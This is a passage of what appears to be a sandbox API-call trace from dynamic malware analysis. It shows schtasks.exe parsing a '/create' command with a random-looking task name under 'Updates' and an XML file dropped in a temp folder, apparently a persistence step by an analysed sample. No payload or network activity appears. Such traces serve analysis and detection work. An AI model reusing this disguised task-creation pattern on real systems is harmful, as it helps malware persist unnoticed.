_Buffer=0x435318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|TN|") returned 4 [0195.245] lstrlenW (lpString="|change|") returned 8 [0195.245] lstrlenW (lpString="|TN|") returned 4 [0195.245] StrStrIW (lpFirst="|change|", lpSrch="|TN|") returned 0x0 [0195.245] SetLastError (dwErrCode=0x490) [0195.245] lstrlenW (lpString="run") returned 3 [0195.246] lstrlenW (lpString="run") returned 3 [0195.246] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.246] lstrlenW (lpString="TN") returned 2 [0195.246] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.246] _vsnwprintf (in: _Buffer=0x435338, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|run|") returned 5 [0195.246] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|TN|") returned 4 [0195.246] lstrlenW (lpString="|run|") returned 5 [0195.246] lstrlenW (lpString="|TN|") returned 4 [0195.246] StrStrIW (lpFirst="|run|", lpSrch="|TN|") returned 0x0 [0195.246] SetLastError (dwErrCode=0x490) [0195.246] lstrlenW (lpString="end") returned 3 [0195.246] lstrlenW (lpString="end") returned 3 [0195.246] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.246] lstrlenW (lpString="TN") returned 2 [0195.246] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.246] _vsnwprintf (in: _Buffer=0x435338, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|end|") returned 5 [0195.246] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|TN|") returned 4 [0195.246] lstrlenW (lpString="|end|") returned 5 [0195.246] lstrlenW (lpString="|TN|") returned 4 [0195.246] StrStrIW (lpFirst="|end|", lpSrch="|TN|") returned 0x0 [0195.246] SetLastError (dwErrCode=0x490) [0195.246] lstrlenW (lpString="showsid") returned 7 [0195.246] lstrlenW (lpString="showsid") returned 7 [0195.246] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.246] GetProcessHeap () returned 0x420000 [0195.246] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x435338) returned 1 [0195.246] GetProcessHeap () returned 0x420000 [0195.246] RtlReAllocateHeap (Heap=0x420000, Flags=0xc, Ptr=0x435338, Size=0x16) returned 0x435358 [0195.246] lstrlenW (lpString="TN") returned 2 [0195.246] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.246] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0xa, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|showsid|") returned 9 [0195.246] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x5, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|TN|") returned 4 [0195.247] lstrlenW (lpString="|showsid|") returned 9 [0195.247] lstrlenW (lpString="|TN|") returned 4 [0195.247] StrStrIW (lpFirst="|showsid|", lpSrch="|TN|") returned 0x0 [0195.247] SetLastError (dwErrCode=0x490) [0195.247] SetLastError (dwErrCode=0x490) [0195.247] SetLastError (dwErrCode=0x0) [0195.247] lstrlenW (lpString="/TN") returned 3 [0195.247] StrChrIW (lpStart="/TN", wMatch=0x3a) returned 0x0 [0195.247] SetLastError (dwErrCode=0x490) [0195.247] SetLastError (dwErrCode=0x0) [0195.247] lstrlenW (lpString="/TN") returned 3 [0195.247] GetProcessHeap () returned 0x420000 [0195.247] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x8) returned 0x436958 [0195.247] GetProcessHeap () returned 0x420000 [0195.247] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x435338 [0195.247] SetLastError (dwErrCode=0x0) [0195.247] SetLastError (dwErrCode=0x0) [0195.247] lstrlenW (lpString="Updates\\ChFIQxtpqP") returned 18 [0195.247] lstrlenW (lpString="-/") returned 2 [0195.247] StrChrIW (lpStart="-/", wMatch=0x55) returned 0x0 [0195.247] SetLastError (dwErrCode=0x490) [0195.247] SetLastError (dwErrCode=0x490) [0195.247] SetLastError (dwErrCode=0x0) [0195.247] lstrlenW (lpString="Updates\\ChFIQxtpqP") returned 18 [0195.247] StrChrIW (lpStart="Updates\\ChFIQxtpqP", wMatch=0x3a) returned 0x0 [0195.247] SetLastError (dwErrCode=0x490) [0195.247] SetLastError (dwErrCode=0x0) [0195.247] lstrlenW (lpString="Updates\\ChFIQxtpqP") returned 18 [0195.247] GetProcessHeap () returned 0x420000 [0195.247] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x26) returned 0x436968 [0195.247] GetProcessHeap () returned 0x420000 [0195.247] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x435378 [0195.247] SetLastError (dwErrCode=0x0) [0195.247] SetLastError (dwErrCode=0x0) [0195.247] lstrlenW (lpString="/XML") returned 4 [0195.247] lstrlenW (lpString="-/") returned 2 [0195.247] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/" [0195.248] lstrlenW (lpString="?") returned 1 [0195.248] lstrlenW (lpString="?") returned 1 [0195.248] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.248] lstrlenW (lpString="XML") returned 3 [0195.248] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.248] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x4, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|?|") returned 3 [0195.248] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|XML|") returned 5 [0195.248] lstrlenW (lpString="|?|") returned 3 [0195.248] lstrlenW (lpString="|XML|") returned 5 [0195.248] SetLastError (dwErrCode=0x490) [0195.248] lstrlenW (lpString="create") returned 6 [0195.248] lstrlenW (lpString="create") returned 6 [0195.248] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.248] lstrlenW (lpString="XML") returned 3 [0195.248] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.248] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|create|") returned 8 [0195.248] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|XML|") returned 5 [0195.248] lstrlenW (lpString="|create|") returned 8 [0195.248] lstrlenW (lpString="|XML|") returned 5 [0195.248] StrStrIW (lpFirst="|create|", lpSrch="|XML|") returned 0x0 [0195.248] SetLastError (dwErrCode=0x490) [0195.248] lstrlenW (lpString="delete") returned 6 [0195.248] lstrlenW (lpString="delete") returned 6 [0195.248] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.248] lstrlenW (lpString="XML") returned 3 [0195.248] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.248] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|delete|") returned 8 [0195.248] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|XML|") returned 5 [0195.248] lstrlenW (lpString="|delete|") returned 8 [0195.248] lstrlenW (lpString="|XML|") returned 5 [0195.249] StrStrIW (lpFirst="|delete|", lpSrch="|XML|") returned 0x0 [0195.249] SetLastError (dwErrCode=0x490) [0195.249] lstrlenW (lpString="query") returned 5 [0195.249] lstrlenW (lpString="query") returned 5 [0195.249] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.249] lstrlenW (lpString="XML") returned 3 [0195.249] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.249] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x8, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|query|") returned 7 [0195.249] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|XML|") returned 5 [0195.249] lstrlenW (lpString="|query|") returned 7 [0195.249] lstrlenW (lpString="|XML|") returned 5 [0195.249] StrStrIW (lpFirst="|query|", lpSrch="|XML|") returned 0x0 [0195.249] SetLastError (dwErrCode=0x490) [0195.249] lstrlenW (lpString="change") returned 6 [0195.249] lstrlenW (lpString="change") returned 6 [0195.249] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.249] lstrlenW (lpString="XML") returned 3 [0195.249] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.249] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x9, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|change|") returned 8 [0195.249] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|XML|") returned 5 [0195.249] lstrlenW (lpString="|change|") returned 8 [0195.249] lstrlenW (lpString="|XML|") returned 5 [0195.249] StrStrIW (lpFirst="|change|", lpSrch="|XML|") returned 0x0 [0195.249] SetLastError (dwErrCode=0x490) [0195.249] lstrlenW (lpString="run") returned 3 [0195.249] lstrlenW (lpString="run") returned 3 [0195.249] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.249] lstrlenW (lpString="XML") returned 3 [0195.249] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.249] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|run|") returned 5 [0195.250] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|XML|") returned 5 [0195.250] lstrlenW (lpString="|run|") returned 5 [0195.250] lstrlenW (lpString="|XML|") returned 5 [0195.250] StrStrIW (lpFirst="|run|", lpSrch="|XML|") returned 0x0 [0195.250] SetLastError (dwErrCode=0x490) [0195.250] lstrlenW (lpString="end") returned 3 [0195.250] lstrlenW (lpString="end") returned 3 [0195.251] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.251] lstrlenW (lpString="XML") returned 3 [0195.251] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.252] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|end|") returned 5 [0195.252] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|XML|") returned 5 [0195.252] lstrlenW (lpString="|end|") returned 5 [0195.252] lstrlenW (lpString="|XML|") returned 5 [0195.252] StrStrIW (lpFirst="|end|", lpSrch="|XML|") returned 0x0 [0195.252] SetLastError (dwErrCode=0x490) [0195.252] lstrlenW (lpString="showsid") returned 7 [0195.252] lstrlenW (lpString="showsid") returned 7 [0195.252] _memicmp (_Buf1=0x434ce0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.252] lstrlenW (lpString="XML") returned 3 [0195.252] _memicmp (_Buf1=0x434d10, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.252] _vsnwprintf (in: _Buffer=0x435358, _BufferCount=0xa, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|showsid|") returned 9 [0195.252] _vsnwprintf (in: _Buffer=0x435318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x1dfab0 | out: _Buffer="|XML|") returned 5 [0195.252] lstrlenW (lpString="|showsid|") returned 9 [0195.252] lstrlenW (lpString="|XML|") returned 5 [0195.252] StrStrIW (lpFirst="|showsid|", lpSrch="|XML|") returned 0x0 [0195.252] SetLastError (dwErrCode=0x490) [0195.252] SetLastError (dwErrCode=0x490) [0195.252] SetLastError (dwErrCode=0x0) [0195.252] lstrlenW (lpString="/XML") returned 4 [0195.252] StrChrIW (lpStart="/XML", wMatch=0x3a) returned 0x0 [0195.252] SetLastError (dwErrCode=0x490) [0195.252] SetLastError (dwErrCode=0x0) [0195.252] lstrlenW (lpString="/XML") returned 4 [0195.252] GetProcessHeap () returned 0x420000 [0195.252] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0xa) returned 0x434cf8 [0195.252] GetProcessHeap () returned 0x420000 [0195.252] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x435398 [0195.252] SetLastError (dwErrCode=0x0) [0195.252] SetLastError (dwErrCode=0x0) [0195.252] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp40F5.tmp") returned 60 [0195.252] lstrlenW (lpString="-/") returned 2 [0195.253] StrChrIW (lpStart="-/", wMatch=0x43) returned 0x0 [0195.253] SetLastError (dwErrCode=0x490) [0195.253] SetLastError (dwErrCode=0x490) [0195.253] SetLastError (dwErrCode=0x0) [0195.253] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp40F5.tmp") returned 60 [0195.253] StrChrIW (lpStart="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp40F5.tmp", wMatch=0x3a) returned=":\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp40F5.tmp" [0195.253] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp40F5.tmp") returned 60 [0195.253] GetProcessHeap () returned 0x420000 [0195.253] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x10) returned 0x434d28 [0195.253] _memicmp (_Buf1=0x434d28, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.253] GetProcessHeap () returned 0x420000 [0195.253] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0xc) returned 0x434d40 [0195.253] GetProcessHeap () returned 0x420000 [0195.253] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x10) returned 0x434d58 [0195.253] _memicmp (_Buf1=0x434d58, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.253] GetProcessHeap () returned 0x420000 [0195.253] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x7e) returned 0x436998 [0195.253] SetLastError (dwErrCode=0x7a) [0195.253] SetLastError (dwErrCode=0x0) [0195.253] SetLastError (dwErrCode=0x0) [0195.253] lstrlenW (lpString="C") returned 1 [0195.253] SetLastError (dwErrCode=0x490) [0195.253] SetLastError (dwErrCode=0x0) [0195.253] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\tmp40F5.tmp") returned 60 [0195.253] GetProcessHeap () returned 0x420000 [0195.253] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x7a) returned 0x436a20 [0195.253] GetProcessHeap () returned 0x420000 [0195.253] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x4353b8 [0195.253] SetLastError (dwErrCode=0x0) [0195.253] GetProcessHeap () returned 0x420000 [0195.253] GetProcessHeap () returned 0x420000 [0195.253] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x436958) returned 1 [0195.253] GetProcessHeap () returned 0x420000 [0195.253] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x436958) returned 0x8 [0195.253] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x436958 | out: hHeap=0x420000) returned 1 [0195.253] GetProcessHeap () returned 0x420000 [0195.253] GetProcessHeap () returned 0x420000 [0195.254] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x435338) returned 1 [0195.254] GetProcessHeap () returned 0x420000 [0195.254] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x435338) returned 0x14 [0195.254] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x435338 | out: hHeap=0x420000) returned 1 [0195.254] GetProcessHeap () returned 0x420000 [0195.254] GetProcessHeap () returned 0x420000 [0195.254] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x436968) returned 1 [0195.254] GetProcessHeap () returned 0x420000 [0195.254] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x436968) returned 0x26 [0195.254] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x436968 | out: hHeap=0x420000) returned 1 [0195.254] GetProcessHeap () returned 0x420000 [0195.254] GetProcessHeap () returned 0x420000 [0195.254] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x435378) returned 1 [0195.254] GetProcessHeap () returned 0x420000 [0195.254] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x435378) returned 0x14 [0195.254] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x435378 | out: hHeap=0x420000) returned 1 [0195.254] GetProcessHeap () returned 0x420000 [0195.254] GetProcessHeap () returned 0x420000 [0195.254] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x434cf8) returned 1 [0195.254] GetProcessHeap () returned 0x420000 [0195.254] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x434cf8) returned 0xa [0195.254] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x434cf8 | out: hHeap=0x420000) returned 1 [0195.254] GetProcessHeap () returned 0x420000 [0195.254] GetProcessHeap () returned 0x420000 [0195.254] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x435398) returned 1 [0195.254] GetProcessHeap () returned 0x420000 [0195.254] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x435398) returned 0x14 [0195.254] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x435398 | out: hHeap=0x420000) returned 1 [0195.254] GetProcessHeap () returned 0x420000 [0195.254] GetProcessHeap () returned 0x420000 [0195.254] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x436a20) returned 1 [0195.254] GetProcessHeap () returned 0x420000 [0195.254] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x436a20) returned 0x7a [0195.254] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x436a20 | out: hHeap=0x420000) returned 1 [0195.254] GetProcessHeap () returned 0x420000 [0195.254] GetProcessHeap () returned 0x420000 [0195.254] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x4353b8) returned 1 [0195.255] GetProcessHeap () returned 0x420000 [0195.255] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x4353b8) returned 0x14 [0195.255] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x4353b8 | out: hHeap=0x420000) returned 1 [0195.255] GetProcessHeap () returned 0x420000 [0195.255] GetProcessHeap () returned 0x420000 [0195.255] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x434bd8) returned 1 [0195.255] GetProcessHeap () returned 0x420000 [0195.255] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x434bd8) returned 0x10 [0195.255] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x434bd8 | out: hHeap=0x420000) returned 1 [0195.255] SetLastError (dwErrCode=0x0) [0195.255] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0195.255] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0195.255] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0195.255] VerifyVersionInfoW (in: lpVersionInformation=0x1dcec8, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x1dcec8) returned 1 [0195.255] SetLastError (dwErrCode=0x0) [0195.255] lstrlenW (lpString="create") returned 6 [0195.255] StrChrIW (lpStart="create", wMatch=0x7c) returned 0x0 [0195.255] SetLastError (dwErrCode=0x490) [0195.255] SetLastError (dwErrCode=0x0) [0195.255] lstrlenW (lpString="create") returned 6 [0195.255] GetProcessHeap () returned 0x420000 [0195.255] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x4353b8 [0195.255] GetProcessHeap () returned 0x420000 [0195.255] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x10) returned 0x434bd8 [0195.255] _memicmp (_Buf1=0x434bd8, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.255] GetProcessHeap () returned 0x420000 [0195.255] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x16) returned 0x435398 [0195.256] SetLastError (dwErrCode=0x0) [0195.256] _memicmp (_Buf1=0x434c50, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.256] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x435a80, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0195.256] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744 [0195.256] GetProcessHeap () returned 0x420000 [0195.256] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x74e) returned 0x435c90 [0195.256] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x435c90 | out: lpData=0x435c90) returned 1 [0195.256] VerQueryValueW (in: pBlock=0x435c90, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1dcfd0, puLen=0x1dcfd4 | out: lplpBuffer=0x1dcfd0*=0x43602c, puLen=0x1dcfd4) returned 1 [0195.256] _memicmp (_Buf1=0x434c50, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.256] _vsnwprintf (in: _Buffer=0x435a80, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x1dcfb8 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0195.256] VerQueryValueW (in: pBlock=0x435c90, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x1dcfe0, puLen=0x1dcfdc | out: lplpBuffer=0x1dcfe0*=0x435e58, puLen=0x1dcfdc) returned 1 [0195.256] lstrlenW (lpString="schtasks.exe") returned 12 [0195.256] lstrlenW (lpString="schtasks.exe") returned 12 [0195.256] lstrlenW (lpString=".EXE") returned 4 [0195.256] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0195.256] lstrlenW (lpString="schtasks.exe") returned 12 [0195.256] lstrlenW (lpString=".EXE") returned 4 [0195.256] lstrlenW (lpString="schtasks") returned 8 [0195.256] lstrlenW (lpString="/create") returned 7 [0195.256] _memicmp (_Buf1=0x434c50, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.256] _vsnwprintf (in: _Buffer=0x435a80, _BufferCount=0x19, _Format="%s %s", _ArgList=0x1dcfb8 | out: _Buffer="schtasks /create") returned 16 [0195.257] _memicmp (_Buf1=0x434cb0, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.257] GetProcessHeap () returned 0x420000 [0195.257] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x14) returned 0x435378 [0195.257] _memicmp (_Buf1=0x434cc8, _Buf2=0x391ed8, _Size=0x7) returned 0 [0195.257] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x436718, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0195.257] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0195.257] GetProcessHeap () returned 0x420000 [0195.257] RtlAllocateHeap (HeapHandle=0x420000, Flags=0xc, Size=0x30) returned 0x436958 [0195.257] _vsnwprintf (in: _Buffer=0x436670, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x1dcfbc | out: _Buffer="Type \"SCHTASKS /CREATE /?\" for usage.") returned 37 [0195.257] GetProcessHeap () returned 0x420000 [0195.257] GetProcessHeap () returned 0x420000 [0195.257] HeapValidate (hHeap=0x420000, dwFlags=0x0, lpMem=0x435c90) returned 1 [0195.257] GetProcessHeap () returned 0x420000 [0195.257] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x435c90) returned 0x74e [0195.257] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x435c90 | out: hHeap=0x420000) returned 1 [0195.257] SetLastError (dwErrCode=0x0) [0195.257] GetThreadLocale () returned 0x409 [0195.257] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.257] lstrlenW (lpString="create") returned 6 [0195.257] GetThreadLocale () returned 0x409 [0195.257] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.257] lstrlenW (lpString="?") returned 1 [0195.257] GetThreadLocale () returned 0x409 [0195.257] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.257] lstrlenW (lpString="s") returned 1 [0195.257] GetThreadLocale () returned 0x409 [0195.257] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.257] lstrlenW (lpString="u") returned 1 [0195.257] GetThreadLocale () returned 0x409 [0195.257] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.257] lstrlenW (lpString="p") returned 1 [0195.257] GetThreadLocale () returned 0x409 [0195.257] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.258] lstrlenW (lpString="ru") returned 2 [0195.258] GetThreadLocale () returned 0x409 [0195.258] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.258] lstrlenW (lpString="rp") returned 2 [0195.258] GetThreadLocale () returned 0x409 [0195.258] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.258] lstrlenW (lpString="sc") returned 2 [0195.258] GetThreadLocale () returned 0x409 [0195.258] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.258] lstrlenW (lpString="mo") returned 2 [0195.258] GetThreadLocale () returned 0x409 [0195.258] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.258] lstrlenW (lpString="d") returned 1 [0195.258] GetThreadLocale () returned 0x409 [0195.258] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.258] lstrlenW (lpString="m") returned 1 [0195.258] GetThreadLocale () returned 0x409 [0195.258] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.258] lstrlenW (lpString="i") returned 1 [0195.258] GetThreadLocale () returned 0x409 [0195.258] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.258] lstrlenW (lpString="tn") returned 2 [0195.258] GetThreadLocale () returned 0x409 [0195.258] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.258] lstrlenW (lpString="tr") returned 2 [0195.258] GetThreadLocale () returned 0x409 [0195.258] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.259] lstrlenW (lpString="st") returned 2 [0195.259] GetThreadLocale () returned 0x409 [0195.259] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.259] lstrlenW (lpString="sd") returned 2 [0195.259] GetThreadLocale () returned 0x409 [0195.259] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0195.259] lstrlenW (lpString="ed") returned 2 [0195.259] GetThreadLocale () returned 0x409 [0195.259] CompareStringA (Locale=0x409, 